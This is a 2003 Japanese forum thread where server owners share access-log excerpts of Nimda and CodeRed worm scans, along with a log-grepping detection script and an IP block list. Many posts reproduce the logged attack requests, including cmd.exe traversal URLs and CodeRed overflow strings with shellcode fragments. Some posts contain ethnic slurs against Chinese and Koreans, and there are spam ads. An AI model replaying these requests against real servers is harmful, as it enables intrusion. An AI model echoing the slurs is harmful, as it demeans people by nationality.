この鯖ワームにやられてますat MYSV
この鯖ワームにやられてます - 暇つぶし2ch8:つっこんでおいてあげよう
03/02/08 18:12 .net
>>4
それはワム

9:DNS未登録さん
03/02/08 18:27 mqoXGeCK.net
>>7
あんた馬鹿の一つ覚えを繰り返してるゴミ送信主かい?


10:DNS未登録さん
03/02/08 18:39 rLjflOVM.net
>>6
どうやってやるんですか?

11:DNS未登録さん
03/02/08 18:44 .net
>>9
うちもYahooBBで、YahooBBにしてから(IPアドレスが218.*.*.*になってから)Nimdaの攻撃が激増したから聞いているだけなんだけど・・・

12:DNS未登録さん
03/02/08 19:09 .net
>>10
ここでも嫁
URLリンク(www.zdnet.co.jp)

13:DNS未登録
03/02/08 20:54 .net
>>4
>>8
ワラタ

14:DNS未登録さん
03/02/08 21:25 .net
こういうのってプロバイダに通報した方がいいの?

15:DNS未登録さん
03/02/08 21:40 OJy9I2w0.net
>>11
確かに、YahooBB(218.*.*.* と219.*.*.*がほとんど43.*.*.* 220.*.*.*は少ない)
はNimdaの攻撃が多い。www.bbtec.netはApache使ってるし
DNS(dns**.bbtec.net)はBIND8使ってるから、一般ユーザが感染していると考えられる。
常時接続で、知らぬ間にIIS探ししてるんだよね。1スキャンで16ヒットするから
ログ解析ツールwebalizer,mrtgその他を使うとすぐ分る。
根本解決は管理者に教えてあげることだけど、めんどくさく、難しい事も多い。
逆引き出来れば良い方で、IP偽ってるのも結構ある。
対処方法は、>>6 が言っているようにログに残らないようにするのが簡単。

16:DNS未登録さん
03/02/09 10:08 .net
仮にも管理者が決まっている鯖なら、いくらぐーたらでも
さすがにCodeRed/Nimda/Slammer級のワームについては対策されてると思いたいが。。。
今ごろになってもNimdaやらまきちらしてるのは
知らないうちにIISが動いてて持ち主も把握してないようなマシンだろう。
そういう「持ち主」はいても「管理者」はいないようなマシンは
リプレースされるまでそのままだと思うよ。


17:DNS未登録さん
03/02/10 00:10 .net
久々にNIMDA来た
219.180.170.51 - - [09/Feb/2003:22:38:17 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 447

18:DNS未登録さん
03/02/10 03:48 j1IeEeCl.net
久々にCodeRed来た
80.204.44.179 - - [10/Feb/2003:00:34:17 +0900] "GET /default.ida?NNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%
u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u5
31b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 309 "-" "-"


19:DNS未登録さん
03/02/10 04:21 QfHjKzWg.net
ぷららのDDNSだけどぷららも結構多いよ。
nslookupで引くとほとんどがぷららさん・・・

20:DNS未登録さん
03/02/10 15:20 .net
>19 いまだにnslookup
( ´,_ゝ`)フ゜ッ

21:名無しさん@カラアゲうまうま
03/02/10 15:48 .net
ネームサーバをさせるわけでもないのに、
わざわざ dig や host のために bind for win をインストールしたり、
dnsip やら dnsipq やらのためにわざわざパッチ当てて
djbdns をコンパイルするのはアレだし。
この程度のことならば nslookup でも特に問題にならんと思うんだけど、
他に Windows で使えるいいツール知らんかい? >>20


22:DNS未登録さん
03/02/10 15:53 rOagKP5I.net
218.200.211.35 - - [10/Feb/2003:07:28:37 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 318 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:28:41 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 316 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:28:42 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:28:42 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:04 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:05 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 357 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:06 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 357 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:07 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 373 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:07 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:08 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:09 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:10 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:10 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 323 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:11 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 323 "-" "-"


23:DNS未登録さん
03/02/10 16:05 rOagKP5I.net
自動的にワームからのアクセスがあったときに
root@アクセス元IPアドレス
とかに警告メール出すようなソフトだれか作ってくり。

24:名無しさん@カラアゲうまうま
03/02/10 16:08 .net
>>23
URLリンク(reuven.lerner.co.il)

25:DNS未登録さん
03/02/10 16:25 rOagKP5I.net
>>24
make test
PERL_DL_NONLAZY=1 /usr/bin/perl -Iblib/arch -Iblib/lib -I/usr/libdata/perl/5.00503/mach -I/usr/libdata/perl/5.00503 test
.pl
1..1
Can't locate warnings.pm in @INC (@INC contains: blib/arch blib/lib /usr/libdata/perl/5.00503/mach /usr/libdata/perl/5.0
0503 /usr/libdata/perl/5.00503/mach /usr/libdata/perl/5.00503 /usr/local/lib/perl5/site_perl/5.005/i386-freebsd /usr/loc
al/lib/perl5/site_perl/5.005 .) at blib/lib/Apache/CodeRed.pm line 4.
BEGIN failed--compilation aborted at blib/lib/Apache/CodeRed.pm line 4.
BEGIN failed--compilation aborted at test.pl line 10.
*** Error code 2
Stop in /tmp/Apache-CodeRed-1.07

26:DNS未登録さん
03/02/10 16:29 8rUySNNC.net
URLリンク(bbs.1oku.com)
★ココだ★ココだ★

27:
03/02/10 17:38 .net
>>23
警告メールは、やっぱり、
「回線切って、首つって、氏ね」
みたいなの?


28:DNS未登録さん
03/02/11 11:43 .net
>>19
それってぷららのDDNS使ってるからじゃない?
Nimdaはご近所さん攻撃するものだし。

29:DNS未登録さん
03/02/11 19:06 .net
確かにNimdaは感染したマシンのセグメント付近に攻撃するよね。
所詮DDNSは、とりあえず立てましたって人が使うから管理甘いのよね。

30:DNS未登録さん
03/02/12 03:34 .net
>>23
こんだけ騒がれてるのにいまだにワームをまきちらかしてるような奴が
そんなの読むわけないと思われ。
だいたいWindowsが多いんだからrootに出してもまず無意味。
net send(smbclient -M)を送り返すとかしたほうがまだしも効果があるだろう。


31:DNS未登録さん
03/02/12 22:58 e3CqtLIi.net
ピコ郎

32:DNS未登録さん
03/02/13 19:37 .net
久々だな。
62.217.134.16 - - [13/Feb/2003:19:21:53 +0900] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%
u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 226

33:DNS未登録さん
03/02/13 21:11 0FAikRrM.net
最近codered多くない? しばらくこなかったけど
最近1日3回位くるYO ちなみに屋不ーBB


34:DNS未登録さん
03/02/13 21:32 5F3nLZxs.net
[Thu Feb 13 18:32:04 2003] [error] [client 61.136.62.193] File does not exist: d:/network/server/apache/dcroot/scripts/..チ/winnt/system32/cmd.exe
[Thu Feb 13 18:32:05 2003] [error] [client 61.136.62.193] File does not exist: d:/network/server/apache/dcroot/scripts/..タッ/winnt/system32/cmd.exe
[Thu Feb 13 18:32:05 2003] [error] [client 61.136.62.193] File does not exist: d:/network/server/apache/dcroot/scripts/..チ�/winnt/system32/cmd.exe
[Thu Feb 13 18:32:07 2003] [error] [client 61.136.62.193] File does not exist: d:/network/server/apache/dcroot/scripts/..%5c/winnt/system32/cmd.exe
[Thu Feb 13 18:32:07 2003] [error] [client 61.136.62.193] File does not exist: d:/network/server/apache/dcroot/scripts/..%2f/winnt/system32/cmd.exe
俺みたいにISDNで鯖をやってるようなヤシの所にも来るのか・・・

35:32
03/02/13 21:44 .net
>>33
うちもYahoo!BBだよ。
多すぎってほどじゃないけど、やっぱり日に2~5件くらいはくるですねぇ。

36:32
03/02/13 21:45 .net
……と、access_logをgrepして気が付きますた。
全然久々じゃないじゃないか (w

37:DNS未登録さん
03/02/15 17:01 Dzt44uVK.net
お前らみたいな糞坊が鯖なんか立てるから、ウィルスが万円して逝くんだよ
もっと勉強してから立てれ

38:● ◆5PTORPEDog
03/02/15 17:07 LDMrKlpL.net
漏れの所も…
その1
[Fri Feb 14 21:44:55 2003] [error] [client 219.180.88.58] File does not exist: /var/www/html/scripts
[Fri Feb 14 21:44:55 2003] [error] [client 219.180.88.58] File does not exist: /var/www/html/MSADC
[Fri Feb 14 21:44:56 2003] [error] [client 219.180.88.58] File does not exist: /var/www/html/c
[Fri Feb 14 21:44:56 2003] [error] [client 219.180.88.58] File does not exist: /var/www/html/d
その2
[Sat Feb 15 01:25:25 2003] [error] [client 219.185.44.146] File does not exist: /var/www/html/scripts
[Sat Feb 15 01:25:25 2003] [error] [client 219.185.44.146] File does not exist: /var/www/html/MSADC
[Sat Feb 15 01:25:25 2003] [error] [client 219.185.44.146] File does not exist: /var/www/html/c
[Sat Feb 15 01:25:25 2003] [error] [client 219.185.44.146] File does not exist: /var/www/html/d
両方ともにahoo!BB。
頼むよ。漏れもahoo!BBなんだけどさ(涙

39:DNS未登録さん
03/02/23 01:57 .net
一週間で1000リクエストほどワーム来るね

40:DNS未登録さん
03/02/24 10:42 .net
うちもぷららのDDNS使ってますが、サーバ開通直後に
わんさか来たので、ログの一部をサポートセンターに
送って対処をお願いしたら、それ以後は随分少なく
なりましたよ。まあ、偶然かもしれませんが...


41:40
03/02/24 16:56 .net
やっぱり偶然でした(T_T)
どうやら、土日はお休みで電源が落ちていただけの模様です。
ただのパソコンなんだろうな...

42:DNS未登録さん
03/02/28 14:41 .net
友人のケースでは、相手を特定して電話してやっと解決したってケースがありました。
相手は設計事務所のサーバーだったそうです。 それだから連絡先がわかった、と
いうことでもありますが。 プロバイダーはシカトを決め込んでいたそうです。

43:DNS未登録さん
03/03/08 08:13 .net
少々のワームやウイルスはいちいちかまってられないが、
前OCNユーザーから1日200通のウイルスメールがきたときは
さすがにたまりかねてOCNに連絡したよ…
鯖とは関係ない話だがな…


44:飛石3連休 ◆8772606082
03/03/09 10:43 q66m7LbT.net
218.9.76.4 - - [07/Mar/2003:22:22:26 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215
218.11.16.6 - - [06/Mar/2003:21:32:04 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215
218.4.144.106 - - [06/Mar/2003:21:09:25 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215
218.12.182.39 - - [06/Mar/2003:07:46:12 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215
いい加減蝋人形にしちゃうよ?!

45:DNS未登録さん
03/03/09 12:08 .net
218.9.6.222 - - [08/Mar/2003:12:13:13 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"
218.18.18.72 - - [08/Mar/2003:15:38:43 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"
218.27.89.97 - - [08/Mar/2003:18:23:39 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"
218.6.243.62 - - [08/Mar/2003:19:01:17 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"
218.244.75.70 - - [08/Mar/2003:20:31:32 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"
いい加減蝋人形にしちゃうよ?!

46:DNS未登録さん
03/03/09 12:24 .net
本日のニムダアクセス
韓国 61.250.216.1
中国 61.132.75.252

47:DNS未登録さん
03/03/09 13:45 +7NxEJAT.net
#!/bin/sh
if [ $1 ] && [ -f $1 ]; then
ACCESS_LOG=$1
elif [ -f /usr/local/apache/logs/access_log ]; then
ACCESS_LOG=/usr/local/apache/logs/access_log
else
echo "usage: $0 path_to_access_log"
exit 1
fi
egrep "cmd.exe|root.exe|NNNNNN" $ACCESS_LOG \
| awk '{ print $4,$5,$1; }' \
| sort -k 3,3 -u | sort -k 1,1 \
| sed -e 's/^/スキャン歓迎: /g' | more
exit 0

48:DNS未登録さん
03/03/09 14:24 .net
ワラタ

49:DNS未登録さん
03/03/10 22:18 .net
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215
上のようなログがたくさんあるんですが、404じゃなくて302なのです・・・。
なんでかわかるかた教えてくださいm(__)m

50:DNS未登録さん
03/03/10 22:20 t9dgL7sB.net
これはどうなのかな。。。
[Sun Mar 09 23:10:05 2003] [error] [client 218.78.252.218] File does not exist: c:/www/scripts/..チ/winnt/system32/cmd.exe
[Sun Mar 09 23:10:07 2003] [error] [client 218.78.252.218] File does not exist: c:/www/scripts/..タッ/winnt/system32/cmd.exe
[Sun Mar 09 23:10:09 2003] [error] [client 218.78.252.218] File does not exist: c:/www/scripts/..チ・winnt/system32/cmd.exe
[Sun Mar 09 23:10:15 2003] [error] [client 218.78.252.218] File does not exist: c:/www/scripts/..%5c/winnt/system32/cmd.exe
[Sun Mar 09 23:10:20 2003] [error] [client 218.78.252.218] File does not exist: c:/www/scripts/..%2f/winnt/system32/cmd.exe

51:DNS未登録さん
03/03/10 22:32 d65/2I7l.net
  ∋8ノノハ.∩
   川o・-・)ノ <先生!こんなのがありました!
__/ /    /   
\(_ノ ̄ ̄ ̄\
||ヽ|| ̄ ̄ ̄ ̄||
 ...|| ̄ ̄ ̄ ̄||
URLリンク(saitama.gasuki.com)

52:DNS未登録さん
03/03/11 02:12 .net
うちも、チョンとチャンコロばっかりです。
URLリンク(www.arearesearch.co.jp)
今日は珍しく、アメリカのDSL回線とアラブ首長国連邦があった

53:DNS未登録さん
03/03/11 06:40 .net


       ま    た    中    国    か



54:DNS未登録さん
03/03/12 23:51 .net
default.ida?XXXXX...増殖中。
0件: 5/Mar
0件: 6/Mar
0件: 7/Mar
0件: 8/Mar
0件: 9/Mar
0件: 10/Mar
12件: 11/Mar
48件: 12/Mar

55:DNS未登録さん
03/03/13 15:32 EzD2j/Xg.net
上にもあるが、最近こんなヤシが来るんですがこれもCODEREDだよね?
2003/03/13(13:14:12) W-SV 219.*.***.*** [80] 404 237 "GET /
default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXY090V858\bd3W801Y090
V858\bd3W801Y090V858\bd3W801Y090Y090X190P0c3P003Xb00U31bU3ffP078
P000P0=a HTTP/1.0"
今まで見たNNNってヤシと違うもんだから気になって、、


56:DNS未登録さん
03/03/13 15:34 j2B84i1p.net
URLリンク(www.pink-angel.jp)
★その目で確認すべし!!★超おすすめ★

57:DNS未登録さん
03/03/13 15:56 .net
>>52
国際的ですね(w

58:山崎渉
03/03/13 16:55 .net
(^^)

59:DNS未登録さん
03/03/13 22:31 C6UKAtSK.net
ほぼ毎日、韓国、中国。たまに日本。

60:DNS未登録さん
03/03/14 03:03 .net
韓国と中国がものすごく多い。
あと、日本国内だと普通の企業とか。

61:DNS未登録さん
03/03/14 11:03 .net
ここ数日はCodeRed IIが多いですね、国内外を問わず。
荒らしてくれるのは、
愛知、神奈川、埼玉あたりが多いです。

62:DNS未登録さん
03/03/14 23:03 SKFFyD7J.net
我々に直接的な害はないんですがね。
見てて気持ち悪いですよ。

63:DNS未登録さん
03/03/15 23:45 7XBHLTMt.net
こんなの出てた
61.191.128.106 - - [15/Mar/2003:20:26:20 +0900] "GET /default.ida?XXXX
XXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 275
61.48.32.168 - - [15/Mar/2003:20:33:57 +0900] "GET /default.ida?XXXXXX
XXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 275
61.83.171.22 - - [15/Mar/2003:22:54:03 +0900] "GET /default.ida?XXXXXX
XXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 276


64:DNS未登録さん
03/03/16 00:41 .net
CodeRedII多いなぁ
219.168.40.15 - - [15/Mar/2003:06:09:38 +0900] "GET /default.ida?XXXXXXXXXXXXXX
219.93.193.170 - - [15/Mar/2003:12:12:01 +0900] "GET /default.ida?XXXXXXXXXXXXX
219.94.102.51 - - [15/Mar/2003:16:44:21 +0900] "GET /default.ida?XXXXXXXXXXXXXX
219.145.159.175 - - [15/Mar/2003:17:57:31 +0900] "GET /default.ida?XXXXXXXXXXXX
219.138.9.227 - - [15/Mar/2003:19:18:09 +0900] "GET /default.ida?XXXXXXXXXXXXXX


65:DNS未登録さん
03/03/16 12:03 YmIrJiRn.net
218.64.67.194 - - [15/Mar/2003:18:26:32 +0900] "GET /default.ida?XXXXXXXXX
流行ってるね。

66:DNS未登録さん
03/03/16 21:36 /QhqGxAD.net
設置者は居ても、管理者が居ない鯖が多いということで

67:tantei
03/03/16 21:52 .net
★あなたのお悩み解決致します!!
●浮気素行調査
彼氏、彼女、妻、夫の浮気を調査致します!!
●盗聴器盗撮機発見
あなたの部屋に誰かが仕掛けているかも!!
●行方調査
行方不明になっている家族の消息を調査致します!!
●電話番号から住所割り出し
一般電話、携帯から住所を割り出し致します!!
●ストーカー対策
社会問題ともなっているストーカーを撃退致します!!
その他人生相談からどんなお悩みでも解決いたします!!
 直通  090-8505-3086
URL  URLリンク(www.h5.dion.ne.jp)
メール  hentaimtt@k9.dion.ne.jp
   グローバル探偵事務局 


68:俺の鯖も・・・しつこく来る
03/03/16 22:09 .net
003/03/16(20:32:54) W-SV 61.199.98.125 [80] 200 950 "GET /kiyaku.html HTTP/1.1"
2003/03/16(20:33:31) W-SV 61.251.250.14 [80] 404 242 "GET /scripts/root.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:32) W-SV 61.251.250.14 [80] 404 240 "GET /MSADC/root.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:32) W-SV 61.251.250.14 [80] 404 250 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:33) W-SV 61.251.250.14 [80] 404 250 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:36) W-SV 61.251.250.14 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 61.251.250.14 "/scripts/..\../winnt/system32/cmd.exe" ]"
2003/03/16(20:33:36) W-SV 61.251.250.14 [80] 403 262 "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:37) W-SV 61.251.250.14 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 61.251.250.14 "/_vti_bin/..\../..\../..\../winnt/system32/cmd.exe" ]"
2003/03/16(20:33:37) W-SV 61.251.250.14 [80] 403 275 "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:41) W-SV 61.251.250.14 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 61.251.250.14 "/_mem_bin/..\../..\../..\../winnt/system32/cmd.exe" ]"
2003/03/16(20:33:41) W-SV 61.251.250.14 [80] 403 275 "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:44) W-SV 61.251.250.14 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 61.251.250.14 "/msadc/..\../..\../..\/..チ../..チ../..チ../winnt/system32/cmd.exe" ]"
2003/03/16(20:33:44) W-SV 61.251.250.14 [80] 403 291 "GET /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:45) W-SV 61.251.250.14 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 61.251.250.14 "/scripts/..チ../winnt/system32/cmd.exe" ]"
2003/03/16(20:33:45) W-SV 61.251.250.14 [80] 403 263 "GET /scripts/..チ../winnt/system32/cmd.exe?/c+dir HTTP/1.0"


69:DNS未登録さん
03/03/18 15:13 .net
>68
規約ってなんだっ

70:DNS未登録さん
03/03/19 04:21 .net
CodeRedIIウザー(´Д`;
219.138.52.14 - - [19/Mar/2003:00:45:01 +0900] "GET /default.ida?
219.234.238.253 - - [18/Mar/2003:18:09:40 +0900] "GET /default.ida?
219.215.44.61 - - [18/Mar/2003:20:44:08 +0900] "GET /default.ida?
219.138.1.212 - - [19/Mar/2003:01:34:27 +0900] "GET /default.ida?
219.68.217.243 - - [19/Mar/2003:01:50:51 +0900] "GET /default.ida?
中国でもWindowsServer使ってるのか・・・
テストのため1日晒してただけで結構来るねぇ。

71:DNS未登録さん
03/03/20 01:39 .net
迷惑。マシンごと逝ってくれ、とくに220.13.136.85
YahooBB220013136085.bbtec.net - - [18/Mar/2003:04:00:21 +0900] "GET /default.ida?XXXXXXXXX
YahooBB220013232179.bbtec.net - - [18/Mar/2003:07:09:43 +0900] "GET /default.ida?XXXXXXXXX
YahooBB220027008006.bbtec.net - - [19/Mar/2003:09:17:43 +0900] "GET /default.ida?XXXXXXXXX


72:DNS未登録さん
03/03/20 10:39 .net
>>71
うちも220.*.*.*からばかり来てるな。
まだそれほど多いと感じて無いけど。

73:404.HDML ◆StMXML.EXE
03/03/23 04:15 .net
61.236.229.237からCodeRedが北んで、何かと思ってアクセスしたら、
www.okxa.comというドメインのサイトですた。
何、ココ?エロゲサイト?

74:DNS未登録さん
03/03/25 13:12 kTD0oBas.net
うちは、1日に、CodeRedが34回、Nimdaが32回なんてのも、
普通だす。
なんとかしたいのでつが・・・
サーバーは、BIGLOBEです。。

75:DNS未登録さん
03/03/25 15:51 .net
>>73
下にメアド書いてあるじゃん。とりあえず英語と中国語?で文句言ってみれば?

76:DNS未登録さん
03/03/26 06:30 .net
まぁ、MicroSoftのWebサイトにCodeRed.F対策のアナウンスが挙がってるんだから
身に覚えのある人はパッチをあてて欲しいですね

77:DNS未登録さん
03/04/02 23:02 .net
最近やたらCodeRedII多くないかい?
218.***.***.***から目茶苦茶(100/day程度)来るんだけど

あーうぜー

78:DNS未登録さん
03/04/02 23:14 .net
初めて見た。
210.220.73.20 - - [02/Apr/2003:06:56:31 +0900] "GET / HTTP/1.1" 200 765 "-" "-"
210.220.73.20 - - [02/Apr/2003:06:56:32 +0900] "GET /NULL.printer HTTP/1.1" 404
1059 "-" "-"
210.220.73.20 - - [02/Apr/2003:06:56:32 +0900] "GET /NULL.IDA?CCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC%u0aeb%ub890%udacf%u77ee%u
0000%u0000%u838b%u0094%u0000%u408・・・以降文字化けで表示できない

79:DNS未登録さん
03/04/03 00:21 .net
SYN Flood Attackしてくる香具師もなんとかしる

80:DNS未登録さん
03/04/05 17:49 .net
>78
ウチにも来たよ
211.189.57.126から
最初はイタズラされてるだけあかと持ったんだけど、新しいワームかね?
相手はコーリャンのIISでした。

81:DNS未登録さん
03/04/06 10:36 .net
211.158.61.191 - - [06/Apr/2003:05:12:15 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:20 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:25 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:31 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:36 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:41 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:47 +0900] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:52 +0900] "GET /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:57 +0900] "GET /scripts/..チ../winnt/system32/cmd.exe HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:13:02 +0900] "GET /scripts/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:13:08 +0900] "GET /../winnt/system32/cmd.exe HTTP/1.0" 403 194
211.158.61.191 - - [06/Apr/2003:05:13:13 +0900] "GET /../winnt/system32/cmd.exe HTTP/1.0" 403 194
211.158.61.191 - - [06/Apr/2003:05:13:18 +0900] "GET /scripts/..l5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:13:24 +0900] "GET /scripts/..l5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:13:29 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:13:34 +0900] "GET /scripts/..%2f../winnt/system32/cmd.exe HTTP/1.0" 404 215
ウザい。

82:DNS未登録さん
03/04/06 21:18 .net
中国、韓国からのアクセスは禁止!!

83:DNS未登録さん
03/04/07 00:36 .net
どかーん!
(⌒⌒⌒)
 ||
/ ̄ ̄ ̄ ̄ ̄\
| ・ U      |
| |ι         |つ
U||  ̄ ̄ ||
   ̄      ̄
もうおこったぞう
61.232.0.1-61.237.255.254<!-- (CN)CHINA RAILWAY TELECOMMUNICATIONS CENTER -->
218.13.0.1-218.18.255.254<!-- (CN) CHINANET Guangdong province network Data Communication Division China Telecom -->
218.144.0.1-218.159.255.254<!-- (KR)KOREA TELECOM Network Management Center -->
220.64.0.1-220.71.255.254<!-- (KR)KRNIC Korea Network Information Center -->
220.72.0.1-220.87.255.254<!-- (KR)KOREA TELECOM Network Management Center -->
220.112.0.1-220.115.255.254<!-- (CN)Greatwall Broadband Network Co.Ltd. -->
220.163.0.1-220.165.255.254<!-- (CN)CHINANET yunnan province network China Telecom -->
アク禁

84:78
03/04/08 12:12 3BWn4KHU.net
>80
>最初はイタズラされてるだけあかと持ったんだけど、
いたずらしないで頂きたい。
ログ汚れ過ぎ
IIS狙われすぎ
ついでにsage過ぎ
あれ以来きてない。
>83
正解かも


85:●かろりーたさん ◆JwU5Ac6TK2
03/04/09 08:07 .net
どうもアタックの内容がアレなせいで落ちてるっぽいのよね
IPアドレスじゃなくてドメインで狙われてるっぽいし・・・

86:78
